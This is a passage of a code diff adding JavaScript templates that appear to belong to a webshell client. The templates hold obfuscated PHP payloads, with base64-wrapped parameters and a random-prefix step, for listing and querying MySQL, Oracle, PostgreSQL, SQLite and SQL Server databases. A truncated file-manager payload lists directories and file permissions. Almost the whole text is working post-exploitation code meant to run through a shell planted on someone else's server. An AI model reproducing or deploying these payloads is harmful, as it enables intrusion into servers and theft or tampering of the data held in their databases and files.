$port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port);
$q=@mysqli_query($T, "SHOW TABLES FROM \`{$dbn}\`");
while($rs=@mysqli_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mysqli_close($T);`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port);
@mysqli_select_db($T, $dbn);
$q=@mysqli_query($T, "SHOW COLUMNS FROM \`{$tab}\`");
while($rs=@mysqli_fetch_row($q)){
echo(trim($rs[0])." (".$rs[1].")".chr(9));
}
@mysqli_close($T);`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port);
@mysqli_query($T,"SET NAMES ".base64_decode("#{base64::encode}"));
@mysqli_select_db($T,$dbn);
$q=@mysqli_query($T,$sql);
if(is_bool($q)){
echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
}else{
$i=0;
while($col=@mysqli_fetch_field($q)){echo($col->name."\t|\t");
$i++;
}
echo("\\r\\n");
while($rs=@mysqli_fetch_row($q)){
for($c=0;$c<$i;$c++){
echo(base64_encode(trim($rs[$c])));
echo("\\t|\\t");
}
echo("\\r\\n");
}
}
@mysqli_close($T);`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/oracle.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::oracle
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$H=@Ora_Logon("\${usr}/\${pwd}@\${sid}","");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0)).chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
[arg1]: '#{host}',
[arg2]: '#{user}',
[arg3]: '#{passwd}'
},
// 显示数据库所有表
show_tables: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0)).chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$tab=base64_decode("#{base64::table}");
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT COLUMN_NAME,DATA_TYPE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{$tab}' ORDER BY COLUMN_ID");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0))." (".ora_getcolumn($T,1).")".chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"{$sql}");
$R=ora_exec($T);
if($R){
$n=ora_numcols($T);
for($i=0;$i<$n;$i++){
echo(Ora_ColumnName($T,$i)."\\t|\\t");
}
echo("\\r\\n");
while(ora_fetch($T)){
for($i=0;$i<$n;$i++){
echo(base64_encode(trim(ora_getcolumn($T,$i))));
echo("\\t|\\t");
}echo("\\r\\n");
}
}else{
echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/oracle_oci8.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::oracle oci8 驱动
* i 数据分隔符号 => \\t|\\t
*
* session_mode: OCI_DEFAULT 0 OCI_SYSOPER 4 OCI_SYSDBA 2
*
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$chs="utf8";
$mod=0;
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
if(!$H){
echo("ERROR://".@oci_error()["message"]);
}else{
$q=@oci_parse($H,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");
if(@oci_execute($q)){
while(@oci_fetch($q)){
echo(trim(@oci_result($q,1)).chr(9));
}
}else{
echo("Status\\t|\\t\\r\\n");
$e=@oci_error($q);
if($e){
echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
}else{
echo("RmFsc2U="."\\t|\\t\\r\\n");
}
}
@oci_close($H);
};`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$chs="utf8";
$mod=0;
$sql="SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)";
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
if(!$H){
echo("ERROR://".@oci_error()["message"]);
}else{
$q=@oci_parse($H,$sql);
if(@oci_execute($q)){
$n=@oci_fetch_all($q,$res,0,-1,OCI_FETCHSTATEMENT_BY_ROW+OCI_NUM);
if($n==0){
echo("ERROR://Database has no tables or no privilege");
}else{
for($i=0;$i<$n;$i++){
$row=$res[$i];
echo(trim($row[0]).chr(9));
}
}
}else{
echo("Status\\t|\\t\\r\\n");
$e=@oci_error($q);
if($e){
echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
}else{
echo("RmFsc2U="."\\t|\\t\\r\\n");
}
}
@oci_close($H);
};`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
$sql="SELECT COLUMN_NAME,DATA_TYPE,DATA_LENGTH FROM ALL_TAB_COLUMNS WHERE OWNER='{$dbn}' AND TABLE_NAME='{$tab}' ORDER BY COLUMN_ID";
$chs="utf8";
$mod=0;
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
if(!$H){
echo("ERROR://".@oci_error()["message"]);
}else{
$q=@oci_parse($H,$sql);
if(@oci_execute($q)){
$n=@oci_fetch_all($q,$res,0,-1,OCI_FETCHSTATEMENT_BY_ROW+OCI_NUM);
if($n==0){
echo("ERROR://Table has no columns or no privilege");
}else{
for($i=0;$i<$n;$i++){
$row=$res[$i];
echo(trim($row[0])." (".$row[1]."(".$row[2]."))".chr(9));
}
}
}else{
echo("Status\\t|\\t\\r\\n");
$e=@oci_error($q);
if($e){
echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
}else{
echo("RmFsc2U="."\\t|\\t\\r\\n");
}
}
@oci_close($H);
};`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$sid=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$chs=base64_decode("#{base64::encode}");
$chs=$chs?$chs:"utf8";
$mod=0;
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
if(!$H){
echo("ERROR://".@oci_error()["message"]);
}else{
$q=@oci_parse($H,$sql);
if(@oci_execute($q)) {
$n=oci_num_fields($q);
if($n==0){
echo("Affect Rows\\t|\\t\\r\\n".base64_encode(@oci_num_rows($q))."\\t|\\t\\r\\n");
}else{
for($i=1;$i<=$n;$i++){
echo(oci_field_name($q,$i)."\\t|\\t");
}
echo "\\r\\n";
while ($row = @oci_fetch_array($q, OCI_ASSOC+OCI_RETURN_NULLS)) {
foreach ($row as $item) {
echo($item !== null ? base64_encode($item):"")."\\t|\\t";
}
echo "\\r\\n";
}
@oci_free_statement($q);
}
}else{
echo("Status\\t|\\t\\r\\n");
$e=@oci_error($q);
if($e){
echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
}else{
echo("RmFsc2U="."\\t|\\t\\r\\n");
}
}
@oci_close($H);
}`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/postgresql.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::postgresql
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
list($host,$port,$dbn) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$dbn == "" ? $dbn = "postgres" : $dbn;
$arr=array(
'host'=>$host,
'port'=>$port,
'user'=>$usr,
'password'=>$pwd,
'dbname'=>$dbn
);
$cs='';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v ";
}
$T=@pg_connect($cs);
if(!$T){
echo("ERROR://".@pg_last_error());
}else{
$q=@pg_query($T,"SELECT datname FROM pg_database where datistemplate='f';");
if(!$q){
echo("ERROR://".@pg_last_error());
}else{
while($rs=@pg_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@pg_free_result($q);
}
@pg_close($T);
}`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'user'=>$usr,
'password'=>$pwd,
'dbname'=>$dbn,
);
$cs='';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v ";
}
$T=@pg_connect($cs);
if(!$T){
echo("ERROR://".@pg_last_error());
}else{
$q=@pg_query($T,"SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');");
if(!q){
echo("ERROR://".@pg_last_error());
}else{
while($rs=@pg_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@pg_free_result($q);
}
@pg_close($T);
}`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'user'=>$usr,
'password'=>$pwd,
'dbname'=>$dbn,
);
$cs='';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v ";
}
$T=@pg_connect($cs);
if(!$T){
echo("ERROR://".@pg_last_error());
}else{
$q=@pg_query($T,"SELECT column_name,udt_name,character_maximum_length FROM information_schema. COLUMNS WHERE TABLE_NAME = '{$tab}';");
if(!$q){
echo("ERROR://".@pg_last_error());
}else{
while($rs=@pg_fetch_row($q)){
$len=$rs[2]?$rs[2]:"0";
echo(trim($rs[0])." ({$rs[1]}({$len}))".chr(9));
}
@pg_free_result($q);
}
@pg_close($T);
}`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$encode=base64_decode("#{base64::encode}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'user'=>$usr,
'password'=>$pwd,
'dbname'=>$dbn,
);
$cs='';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v ";
}
$T=@pg_connect($cs);
if(!$T){
echo("ERROR://".@pg_last_error());
}else{
$q=@pg_query($T, $sql);
if(!$q){
echo("ERROR://".@pg_last_error());
}else{
$n=@pg_num_fields($q);
if($n===NULL){
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR://".@pg_last_error())."\\t|\\t\\r\\n");
}elseif($n===0){
echo("Affect Rows\\t|\\t\\r\\n".base64_encode(@pg_affected_rows($q))."\\t|\\t\\r\\n");
}else{
for($i=0;$i<$n;$i++){
echo(@pg_field_name($q,$i)."\\t|\\t");
}
echo "\\r\\n";
while($row=@pg_fetch_row($q)){
for($i=0;$i<$n;$i++){
echo(base64_encode($row[$i]!==NULL?$row[$i]:"NULL")."\\t|\\t");
}
echo "\\r\\n";
}
}
@pg_free_result($q);
}
@pg_close($T);
}`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/postgresql_pdo.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::postgresql_pdo
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
list($host, $port,$dbn) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$dbn == "" ? $dbn = "postgres" : $dbn;
$arr=array(
'host'=>$host,
'port'=>$port,
'dbname'=>$dbn
);
$cs='pgsql:';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v;";
}
$dbh=new PDO($cs,$usr,$pwd);
if(!$dbh){
echo("ERROR://CONNECT ERROR");
}else{
$query="select datname FROM pg_database where datistemplate='f';";
$result=$dbh->prepare($query);
$result->execute();
while($res=$result->fetch(PDO::FETCH_ASSOC)){
echo(trim($res['datname']).chr(9));
}
$dbh=null;
}`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'dbname'=>$dbn,
);
$cs='pgsql:';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v;";
}
$dbh=new PDO($cs,$usr,$pwd);
if(!$dbh){
echo("ERROR://CONNECT ERROR");
}else{
$query="SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');";
$result=$dbh->prepare($query);
$result->execute();
while($res=$result->fetch(PDO::FETCH_ASSOC)){
echo(trim($res['table_name']).chr(9));
}
$dbh=null;
}`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'dbname'=>$dbn,
);
$cs='pgsql:';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v;";
}
$dbh=new PDO($cs,$usr,$pwd);
if(!$dbh){
echo("ERROR://CONNECT ERROR");
}else{
$query="SELECT column_name,udt_name,character_maximum_length FROM information_schema.COLUMNS WHERE TABLE_NAME = '{$tab}';";
$result=$dbh->prepare($query);
$result->execute();
while($res=$result->fetch(PDO::FETCH_ASSOC)){
$len=$res['character_maximum_length'] ? $res['character_maximum_length']:"0";
echo(trim($res['column_name'])." ({$res['udt_name']}({$len}))".chr(9));
}
$dbh = null;
}`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$encode=base64_decode("#{base64::encode}");
list($host, $port) = explode(":", $hst);
$port == "" ? $port = "5432" : $port;
$arr=array(
'host'=>$host,
'port'=>$port,
'dbname'=>$dbn,
);
$cs='pgsql:';
foreach($arr as $k=>$v) {
if(empty($v)){
continue;
}
$cs .= "$k=$v;";
}
$dbh=new PDO($cs,$usr,$pwd);
if(!$dbh){
echo("ERROR://CONNECT ERROR");
}else{
$result=$dbh->prepare($sql);
if(!$result->execute()){
echo("Status\\t|\\t\\r\\n");
$err="";
foreach(@$result->errorInfo() as $v){
$err.=$v." ";
}
echo(base64_encode("ERROR://".$err)."\\t|\\t\\r\\n");
}else{
$bool=True;
while($res=$result->fetch(PDO::FETCH_ASSOC)){
if($bool){
foreach($res as $key=>$value){
echo($key."\\t|\\t");
}
echo "\\r\\n";
$bool=False;
}
foreach($res as $key=>$value){
echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
}
echo "\\r\\n";
}
if($bool){
if(!$result->columnCount()){
echo("Affect Rows\\t|\\t\\r\\n".base64_encode($result->rowCount())."\\t|\\t\\r\\n");
}else{
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR://Table is empty.")."\\t|\\t\\r\\n");
}
}
}
$dbh = null;
}`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/sqlite3.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板:: sqlite3
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$dbh=new SQLite3($hst);
if(!$dbh){
echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
}else{
echo("main".chr(9));
$dbh->close();
}`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$dbh=new SQLite3($hst);
if(!$dbh){
echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
}else{
$query="select tbl_name from sqlite_master where type='table' order by tbl_name;";
$stmt=$dbh->prepare($query);
$result=$stmt->execute();
while($res=$result->fetchArray(SQLITE3_ASSOC)){
echo(trim($res['tbl_name']).chr(9));
}
$dbh->close();
}`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$tab=base64_decode("#{base64::table}");
$dbh=new SQLite3($hst);
if(!$dbh){
echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
}else{
$query="pragma table_info('{$tab}');";
$stmt=$dbh->prepare($query);
$result=$stmt->execute();
while($res=$result->fetchArray(SQLITE3_ASSOC)){
echo(trim($res['name'])." ({$res['type']})".chr(9));
}
$dbh->close();
}`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$sql=base64_decode("#{base64::sql}");
$encode=base64_decode("#{base64::encode}");
$dbh=new SQLite3($hst);
if(!$dbh){
echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
}else{
$stmt=$dbh->prepare($sql);
if(!$stmt){
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR://".$dbh->lastErrorMsg())."\\t|\\t\\r\\n");
} else {
$result=$stmt->execute();
if(!$result){
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR://".$dbh->lastErrorMsg())."\\t|\\t\\r\\n");
}else{
$bool=True;
while($res=$result->fetchArray(SQLITE3_ASSOC)){
if($bool){
foreach($res as $key=>$value){
echo($key."\\t|\\t");
}
echo "\\r\\n";
$bool=False;
}
foreach($res as $key=>$value){
echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
}
echo "\\r\\n";
}
if($bool){
if(!$result->numColumns()){
echo("Affect Rows\\t|\\t\\r\\n".base64_encode($dbh->changes())."\\t|\\t\\r\\n");
}else{
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR:// Table is empty.")."\\t|\\t\\r\\n");
}
}
}
}
$dbh->close();
}`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/sqlite_pdo.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板:: sqlite3 pdo
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$cs='sqlite:'.$hst;
$dbh=new PDO($cs,'','');
if(!$dbh){
echo("ERROR:// CONNECT ERROR");
}else{
echo("main".chr(9));
$dbh=null;
}`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$cs='sqlite:'.$hst;
$dbh=new PDO($cs,'','');
if(!$dbh){
echo("ERROR:// CONNECT ERROR");
}else{
$query="select tbl_name from sqlite_master where type='table' order by tbl_name;";
$result=$dbh->prepare($query);
$result->execute();
while($res=$result->fetch(PDO::FETCH_ASSOC)){
echo(trim($res['tbl_name']).chr(9));
}
$dbh=null;
}`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
$cs='sqlite:'.$hst;
$dbh=new PDO($cs,'','');
if(!$dbh){
echo("ERROR:// CONNECT ERROR");
}else{
$query="pragma table_info('{$tab}');";
$result=$dbh->prepare($query);
$result->execute();
while($res=$result->fetch(PDO::FETCH_ASSOC)){
echo(trim($res['name'])." ({$res['type']})".chr(9));
}
$dbh = null;
}`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$encode=base64_decode("#{base64::encode}");
$cs='sqlite:'.$hst;
$dbh=new PDO($cs,'','');
if(!$dbh){
echo("ERROR:// CONNECT ERROR");
}else{
$result=$dbh->prepare($sql);
if(!$result->execute()){
echo("Status\\t|\\t\\r\\n");
$err="";
foreach(@$result->errorInfo() as $v){
$err.=$v." ";
}
echo(base64_encode("ERROR://".$err)."\\t|\\t\\r\\n");
}else{
$bool=True;
while($res=$result->fetch(PDO::FETCH_ASSOC)){
if($bool){
foreach($res as $key=>$value){
echo($key."\\t|\\t");
}
echo "\\r\\n";
$bool=False;
}
foreach($res as $key=>$value){
echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
}
echo "\\r\\n";
}
if($bool){
if(!$result->columnCount()){
echo("Affect Rows\\t|\\t\\r\\n".base64_encode($result->rowCount())."\\t|\\t\\r\\n");
}else{
echo("Status\\t|\\t\\r\\n");
echo(base64_encode("ERROR://Table is empty.")."\\t|\\t\\r\\n");
}
}
}
$dbh = null;
}`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/sqlsrv.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::sqlsrv
* php >= 5.3 原生不支持 mssql, 可采用 sqlsrv 连接 sqlserver
* i 数据分隔符号 => \\t|\\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$chs="utf-8";
$T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>"master","CharacterSet"=>$chs));
$q=@sqlsrv_query($T,"select [name] from master.dbo.sysdatabases order by 1",null);
while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
echo(trim($rs[0]).chr(9));
}
@sqlsrv_free_stmt($q);
@sqlsrv_close($T);`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$chs="utf-8";
$T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
$q=@sqlsrv_query($T,"SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",null);
while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
echo(trim($rs[0]).chr(9));
}
@sqlsrv_free_stmt($q);
@sqlsrv_close($T);`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
$chs='utf-8';
$T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
$q=@sqlsrv_query($T,"select b.name,c.name,c.length from sysobjects a,syscolumns b,systypes c where a.id=b.id and b.xtype=c.xtype and a.name='{$tab}'",null);
while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
echo(trim($rs[0])." ({$rs[1]}({$rs[2]}))".chr(9));
}
@sqlsrv_free_stmt($q);
@sqlsrv_close($T);`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$chs=base64_decode("#{base64::encode}");
$chs=($chs=='utf-8'||$chs=='char')?$chs:'utf-8';
$T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
$q=@sqlsrv_query($T,$sql,null);
if($q!==false){
$i=0;
$fm=@sqlsrv_field_metadata($q);
if(empty($fm)){
$ar=@sqlsrv_rows_affected($q);
echo("Affect Rows\\t|\\t\\r\\n".base64_encode($ar)."\\t|\\t\\r\\n");
}else{
foreach($fm as $rs){
echo($rs['Name']."\\t|\\t");
$i++;
}
echo("\\r\\n");
while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
for($c=0;$c<$i;$c++){
echo(base64_encode(trim($rs[$c])));
echo("\\t|\\t");
}
echo("\\r\\n");
}
}
@sqlsrv_free_stmt($q);
}else{
echo("Status\\t|\\t\\r\\n");
if(($e = sqlsrv_errors()) != null){
foreach($e as $v){
echo(base64_encode($e['message'])."\\t|\\t\\r\\n");
}
}else{
echo("RmFsc2U="."\\t|\\t\\r\\n");
}
}
@sqlsrv_close($T);`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/filemanager.js 0 → 100644
View file @ 38ac1b04
/**
* 文件管理模板
*/
module.exports = (arg1, arg2, arg3) => ({
dir: {
_: `$D=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\\t".$T."\\t".@filesize($P)."\\t".$E."\\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
},
delete: {
